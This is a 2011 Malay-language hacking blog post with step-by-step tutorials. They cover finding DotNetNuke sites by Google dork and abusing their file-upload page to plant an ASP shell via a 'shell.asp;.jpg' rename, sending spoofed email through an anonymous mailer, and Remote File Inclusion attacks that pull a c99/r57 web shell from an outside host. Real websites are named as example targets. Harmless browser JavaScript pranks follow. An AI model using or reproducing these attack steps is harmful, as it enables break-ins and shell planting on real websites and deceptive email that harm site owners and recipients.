Friday 29 July 2011

TUTORIAL: DNN (DotNetNuke) Hacking



Langkah 1: Cari target website

Gunakan “Google Dork” beritkut:
inurl:”/portals/0″ site:.com

Pilih satu website,
Contoh:
http://www.lucasmill.com/


Langkah 2: Test vulnerability

Tambahkan dibelakang web address, code berikut:

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Contoh:
http://www.lucasmill.com/ Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Anda akan dapat gambar seperti dibawah:



Langkah 3: Pilih pilihan ke-3 “File (A File On Your Site)



Langkah 4: Gantikan “Address Bar” dengan Java code berikut:

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)




Langkah 5: Muatnaik file ke website

File yang boleh dimuat naik ialah ~ txt ~ swf ~ jpg ~ gif ~ pdf.



Langkah 6: Check File yang dimuatnaik

File yang dimuat naik boleh dijumpai di:
www.victim.com/portals/0/yourfile.extension

Contoh:
Nama file: pw.txt
File berikut boleh dijumpai di:
http://www.lucasmill.com/portals/0/pw.txt

Untuk muatnaik asp shell, tukar:
shell.asp
menjadi:
shell.asp;.jpg



TUTORIAL: Cara Mengirim Email Palsu






Langkah 1: Pergi website http://anonymailer.net/



Langkah 2: Isi




i) “From Name”: Nama korang
ii) “From E-mail”: Email palsu korang
iii) “To”: Email orang yang hendak di tujukan
iv) “Subject”: Tujuan email dibuat.
v) Di kotak besar, isi email yang akan dikirimkan seperti mengirim email biasa
vi) Isikan code yang muncul
vii) Click “Submit


Untuk tambahan saja, hasil email yang terkirim akan menampilkan footer ads (iklan) dari Anonymailer. Jadi berkemungkinan akan diketahui bahawa email yang dihantar adalah email palsu. Untuk menyembunyikan ads ini, kamu perlu membayar $ 12 per tahun dan sekali penggunaan harus menunggu 15 minit untuk boleh menggunakan lagi (kecuali yang telah membayar).
 

TUTORIAL: Hack website menggunakan Remote File Inclusion (RFI)





Langkah 1: Cari vulnerabile website

Biasanya, RFI vulnerabile site mempunyai format berikut:
www.Targetsite.com/index.php?page=Anything

Untuk mencarinya, boleh lah menggunakan “Google Dorks” berikut:
inurl:index.php?page=

Contoh:
www.cbspk.com/v2/index.php?page=disclaimer.htm



Langkah 2: Test website vulnerability

Tukarkan URL menjadi format seperti berikut:
www.targetsite.com/index.php?page=www.google.com

Contoh:
www.cbspk.com/v2/index.php?page= www.google.com





Langkah 3: Upload shell

Shell yang biasa digunakan ialah c99 ataupun r57.

Download shell:
http://www.localroot.net/

Hacker boleh upload shell di web hosting seperti ripway.com, 110mb.com dan sebagainya.

Contoh URL untuk shell:
http://h1.ripway.com/saurav1234/c99shell.php?


Langkah 4: Aktifkan shell

Tukarkan URL menjadi format berikut:
www.targetsite.com/index.php?page=http://webhosting.com/username/shell?

Contoh:
www.cbspk.com/v2/index.php?page= http://h1.ripway.com/saurav1234/c99shell.php?






Thursday 28 July 2011

Java Script Trick: Gegarkan Browser!!




Langkah 1: Copy & paste java script berikut pada “Address Bar

javascript:function Shw(n) {if (self.moveBy){for (i = 35; i > 0; i--){for (j = n; j > 0; j--){self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)


Langkah 2: Tekan “Enter



Java Script Trick: Hack website..


Langkah 1: Pergi ke mana-mana website


Langkah 2: Copy & paste java script berikut pada “Address Bar

javascript:document.body.contentEditable='true'; document.designMode='on';
void 0


Langkah 3: Tekan “Enter

Apalagi, editlah website tersebut..


Java Script Trick: Lihat Passwords pada Asterisk/Stars (***)




Langkah 1: Buka “Login Page” pada mana-mana website


Langkah 2: Taip “Username” dan “Password


Langkah 3: Copy & paste java script berikut pada “Address Bar

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


Langkah 4: Tekan “Enter

Akan keluar window baru yang menunjukkan “Password” yang ditaip

Java Script Trick: Gambar terjatuh..




Langkah 1: Pergi ke mana-mana website (lagi banyak gambar lagi baik)


Langkah 2: Copy & paste java script berikut pada “Address Bar

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;x4=300; y4=200; x5=300; y5=200;DI=document.images;DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5;DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);


Langkah 3: Tekan “Enter

Java Script Trick: Gambar Menari..




Langkah 1: Pergi ke mana-mana website (lagi banyak gambar lagi baik)


Langkah 2: Copy & paste java script berikut pada “Address Bar

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);



Langkah 3: Tekan “Enter